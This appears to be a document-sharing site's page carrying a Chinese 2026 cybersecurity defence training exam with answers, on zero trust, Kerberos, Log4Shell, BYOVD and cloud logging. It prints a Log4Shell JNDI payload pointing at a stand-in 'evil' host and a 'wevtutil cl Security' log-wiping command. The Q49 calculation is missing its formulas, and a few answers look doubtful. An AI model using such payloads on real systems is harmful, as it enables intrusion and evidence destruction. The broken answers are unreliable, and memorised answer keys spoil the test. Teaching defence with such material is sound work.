2026年网络安全防护与防御培训试卷含答案_第1页
2026年网络安全防护与防御培训试卷含答案_第2页
2026年网络安全防护与防御培训试卷含答案_第3页
2026年网络安全防护与防御培训试卷含答案_第4页
2026年网络安全防护与防御培训试卷含答案_第5页
已阅读5页,还剩15页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

2026年网络安全防护与防御培训试卷含答案一、单项选择题(每题2分,共30分)1.以下哪项最能体现“零信任”架构的核心思想?A.内网默认可信,外网默认不可信B.所有访问主体在每次访问前都必须重新验证身份与权限C.通过VPN即可实现端到端加密D.防火墙策略只需配置一次即可长期生效答案:B2.在Linux系统中,若发现/etc/shadow文件权限被意外改为644,攻击者最可能利用的后续攻击路径是:A.通过内核提权直接获取rootB.利用泄露的哈希离线暴力破解用户口令C.向cron.daily写入恶意脚本D.通过LD_PRELOAD劫持系统调用答案:B3.关于SM4分组密码算法,下列描述正确的是:A.分组长度为128位,密钥长度可变B.采用Feistel结构,轮数为32轮C.解密算法与加密算法使用完全不同的轮密钥顺序D.仅支持ECB与CBC两种模式答案:B4.某企业部署了EDR(端点检测与响应)系统,以下哪项日志最有助于定位“Living-off-the-Land”攻击?A.防火墙NAT日志B.PowerShell命令行日志(事件ID4104)C.DHCP地址分配日志D.NetFlow流量摘要答案:B5.在TLS1.3握手过程中,用于实现“前向保密”的核心机制是:A.静态RSA密钥交换B.ECDHE临时密钥交换C.SessionID复用D.AES-GCM加密答案:B6.某Web应用使用JWT作为会话令牌,签名算法为HS256。若攻击者获取了服务器的硬编码密钥,可造成的最大危害是:A.仅可伪造令牌,无法篡改已有令牌B.可垂直越权访问任意用户数据C.只能重放自己的令牌D.服务器会拒绝所有令牌答案:B7.关于DNS-over-HTTPS(DoH)的安全价值,下列说法错误的是:A.可防止本地ISP劫持解析结果B.默认阻止企业内网审计设备查看域名明文C.能彻底杜绝DNS缓存投毒D.增加攻击者基于DNS隧道的隐蔽通信成本答案:C8.在容器逃逸场景中,攻击者最可能利用以下哪项配置错误?A.将宿主机/var/log挂载为只读B.启用seccomp并设置defaultAllowC.关闭CAP_SYS_ADMIN能力D.使用UserNamespace隔离root答案:B9.某单位采用“红蓝对抗”演练,蓝队发现红队通过Kerberoasting攻击获取服务票据,最佳缓解措施是:A.强制所有服务账户设置为“敏感账户,不能被委派”B.将服务账户口令长度提高到128位并定期轮换C.关闭整个Kerberos认证系统,改用NTLMD.禁用所有SPN答案:B10.关于人工智能在恶意代码检测中的应用,下列哪项属于“对抗样本”威胁?A.训练集过拟合导致高误报B.攻击者在PE头加入扰动使模型置信度下降C.模型参数体积过大难以部署D.缺乏可解释性导致审计困难答案:B11.在5G核心网中,用于隐藏用户永久标识SUPI的临时标识是:A.GUTIB.5G-TMSIC.SUCID.PEI答案:C12.某企业内网出现大量对“pastebin”的HTTPSPOST,最可能的攻击阶段是:A.初始突破B.权限提升C.命令控制D.目标达成答案:C13.关于WindowsCredentialGuard,下列说法正确的是:A.依赖IntelVT-x与AMD-VB.将LSASS进程置于VBS隔离容器C.可防止所有Pass-the-Hash攻击D.支持Windows7SP1答案:B14.在威胁情报共享标准STIX2.1中,用于描述“攻击者使用的基础设施”的对象是:A.indicatorB.malwareC.infrastructureD.attack-pattern答案:C15.某单位使用NISTSP800-63B身份指南,关于“记忆秘密(MemorizedSecret)”长度要求,下列说法正确的是:A.最少8字符,无复杂度要求B.最少12字符,必须含特殊符号C.最少6字符,必须含大小写D.最少15字符,禁止连续重复答案:A二、多项选择题(每题3分,共30分,每题至少有两个正确答案,多选少选均不得分)16.以下哪些技术可有效防御“HTTP参数污染”漏洞?A.在WAF层统一对同名参数取第一个值B.后端框架禁用多值同名参数C.使用严格的URL编码白名单D.在客户端JavaScript过滤特殊字符答案:A、B、C17.关于Ransomware防御,下列措施属于“前置阻断”策略的有:A.部署基于IOPS异常的卷影复制保护B.应用白名单禁止未知二进制执行C.邮件网关删除带宏的Office文件D.离线备份磁带库定期演练恢复答案:B、C18.以下哪些命令可用于Linux系统应急取证时获取易失性数据?A.`lsof>/tmp/lsof.txt`B.`ddif=/dev/memof=/tmp/mem.dump`C.`netstat-tulnp>/tmp/net.txt`D.`cp/proc/kcore/tmp/kcore.dump`答案:A、B、C19.在OAuth2.1授权码流程中,可阻止“授权码泄露”攻击的安全机制有:A.PKCEB.State参数C.客户端密钥(ClientSecret)D.刷新令牌绑定至客户端IP答案:A、B20.关于量子计算对公钥密码的威胁,下列算法属于“后量子密码”候选的有:A.CRYSTALS-KYBERB.FalconC.RSA-4096D.ClassicMcEliece答案:A、B、D21.以下哪些日志源可用于检测“白银票据”攻击?A.域控安全日志事件ID4768(TGT请求)B.域控安全日志事件ID4769(服务票据请求)C.工作站Sysmon事件ID1(进程创建)D.域控安全日志事件ID4771(Kerberos预认证失败)答案:B、D22.关于DevSecOps流水线,下列实践符合“安全左移”理念的有:A.在Git提交阶段触发SAST扫描B.将DAST扫描放在生产环境上线后C.依赖库漏洞扫描在构建阶段失败即阻断D.使用IaC模板扫描检查Terraform安全答案:A、C、D23.以下哪些属于“侧信道”攻击?A.通过功耗分析恢复AES密钥B.利用CPU缓存时序窃取内核数据C.向目标发送畸形报文造成崩溃D.通过电磁辐射还原显示器图像答案:A、B、D24.在Android13中,可降低“StrandHogg”类任务劫持风险的新机制有:A.前台服务必须声明新权限B.应用无法再从后台启动ActivityC.每次权限授予需重新弹窗D.限制不可信输入法答案:A、B25.关于云原生安全,以下哪些措施可缓解“容器仓库投毒”?A.启用镜像签名与Notary验证B.使用AdmissionController拒绝latest标签C.将仓库暴露在公网以便快速拉取D.对镜像进行静态恶意软件扫描答案:A、B、D三、判断题(每题1分,共10分,正确打“√”,错误打“×”)26.在Windows系统中,启用UAC最高级别即可完全阻止BypassUAC攻击。答案:×27.HTTP/3基于QUIC协议,默认内置TLS1.3。答案:√28.使用ChaCha20-Poly1305比AES-GCM在ARM移动端性能更优。答案:√29.“同态加密”技术可在不解密数据的情况下对密文进行任意运算且结果解密后等于明文运算结果,目前已可高效支持任意深度电路。答案:×30.在零信任架构中,微分段(Micro-segmentation)策略一旦下发至交换机,即无需再动态调整。答案:×31.对于内存安全漏洞,Rust语言的所有权机制可在编译期阻止UAF(UseAfterFree)。答案:√32.将Nginx版本号隐藏server_tokensoff;可彻底防止版本指纹识别。答案:×33.在iOS16中,Lockdown模式会禁用JIT与WebAssembly以缩小攻击面。答案:√34.“数据主权”要求跨境数据流动必须经过数据主体明示同意,与GDPR完全一致。答案:×35.使用SHA-3对文件进行完整性校验,其长度扩展攻击抵抗性优于SHA-256。答案:√四、填空题(每空2分,共20分)36.在Linux内核中,用于限制进程系统调用的安全机制是________。答案:seccomp37.当利用________攻击可让只具备“SeBackupPrivilege”权限的用户读取域控NTDS.dit文件。答案:SeRestorePrivilege滥用(或“特权文件操作滥用”)38.在Python3中,使用________库可安全生成加密安全的随机数,替代不安全的random。答案:secrets39.在IPv6中,用于替代ARP的协议是________。答案:NDP(NeighborDiscoveryProtocol)40.在Kubernetes中,通过设置Pod的________字段可强制容器以非root身份运行。答案:securityContext.runAsNonRoot41.在SQL注入防御中,使用参数化查询的本质是将________与________分离。答案:代码、数据42.在无线安全标准WPA3-Enterprise中,引入的密钥建立协议为________,可抵御离线字典攻击。答案:SAE(SimultaneousAuthenticationofEquals)43.在威胁狩猎模型中,________假设(Hypothesis)阶段需要基于IOC与TTP构建可验证的检测语句。答案:初始44.在区块链中,________攻击通过控制节点网络连接延迟来分裂网络视图。答案:Eclipse45.在Windows日志清除痕迹时,攻击者常使用wevtutilcl________命令清除安全日志。答案:Security五、简答题(每题10分,共30分)46.简述“Log4Shell”漏洞(CVE-2021-44228)的触发原理,并给出三条生产环境快速缓解方案(不升级版本前提下)。答案:原理:Log4j2.x在解析日志消息时,若消息中包含${jndi:ldap://evil/Exploit}格式,将触发JNDI查找,从攻击者服务器加载远程Java对象,导致RCE。缓解:1.设置JVM启动参数-Dlog4j2.formatMsgNoLookups=true;2.在WAF层拦截jndi:ldap、3.通过网络策略禁止服务器主动向外发起LDAP/RMI请求(出网限制)。47.说明“BringYourOwnVulnerableDriver”(BYOVD)攻击流程,并列举两种检测方法。答案:流程:1.攻击者将带有已知漏洞的合法驱动(如WinIo、Capcom.sys)拷贝至目标;2.利用该驱动的漏洞(如任意内核读写)执行Shellcode,关闭DSE并加载rootkit;3.获得内核级持久化与隐藏。检测:1.使用DriverQuery与Sysmon事件ID6监控新加载驱动哈希,对比已知脆弱驱动列表;2.启用HVCI(MemoryIntegrity)与VBS,阻止未签名或已知脆弱驱动加载。48.某企业采用多云架构(AWS与阿里云),需满足等保2.0“安全审计”扩展要求,请设计一套跨云统一日志集中方案,要求说明日志来源、传输通道、存储加密与完整性校验细节。答案:日志来源:AWS侧:CloudTrail、VPCFlowLog、Config、GuardDuty;阿里云侧:操作审计、SLS、云安全中心、RDS审计日志。传输:1.通过AWSKinesisFirehose与阿里云SLS数据加工功能,分别将日志推送到各自区域Kafka;2.使用双向TLS1.3通道,通过专线/VPN将Kafka日志跨云转发至第三方中立IDC的Logstash集群;3.传输层启用mTLS证书固定,消息级使用AES-GCM加密,密钥托管在KMS/HSM。存储:1.日志写入Elasticsearch前,使用IngestPipeline计算SHA-256并写入只读字段;2.索引快照每日推送至S3与OSS,使用SSE-KMS/SSE-OSS完全托管密钥;3.启用WORM(对象锁定)策略,保留期1年,禁止删除与覆盖;4.每周随机抽样使用独立HMAC密钥重新计算哈希,与原始哈希比对,若不一致触发告警。六、综合计算题(共30分)49.某单位计划部署IPSecVPN,采用IKEv2+ESP隧道模式,预共享密钥(PSK)认证。已知:预共享密钥为8位小写字母随机串;攻击者可调用Amazonp3.2xlargeGPU实例,使用hashcat进行IKEv2哈希破解;实测hashcat在该实例对IKEv2SHA-256速率R=1.2×10^6次/秒;密钥空间大小|K|=26^8;期望破解概率P≥0.5。请计算:(1)理论暴力破解所需时间T(秒);(2)若将PSK长度提升到12位,并加入数字与特殊符号(共95字符),计算新的密钥空间|K′|;(3)在相同算力下,新的平均破解时间T′(假设概率P=0.5)。答案与解析:(1)平均需尝试一半密钥空间:T=(2)|(3)T结论:8位纯小写PSK在一天内可被GPU暴力破解,而12位95字符PSK在现有算力下不可行,建议采用16位随机PSK或改用数字证书认证。七、方案设计题(共30分)50.阅读场景:某金融公司计划上线“零信任远程办公”项目,用户终端类型包括Windows10、macOS13、iOS16、Android13,业务系统部署在私有云(Kubernetes)、SaaS(Office365、Salesforce)。公司要求:1.所有访问必须先经过身份、设备、网络、上下文四维度评估;2.内部AD为身份源,需支持MFA;3.私有云API需实现mTLS与细粒度授权;4.不允许VPN;5.所有流量可审计、可追溯、可染色。请给出整体技术架构图(文字描述即可),并说明关键组件、协议、数据流、威胁缓解点。答案:架构描述:1.身份平面:部署云原生身份代理(IdentityProxy),基于Okta/Keycloak,通过SAML/OIDC与AD联合,强制MFA(FIDO2+Push);2.设备平面:Windows/macOS安装设备信任代理(CrowdStrike/ZTAAgent),采集硬件指纹、补丁、EDR健康度;iOS/Android使用UEM(Intune)下发证书与移动设备管理配置,检查

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论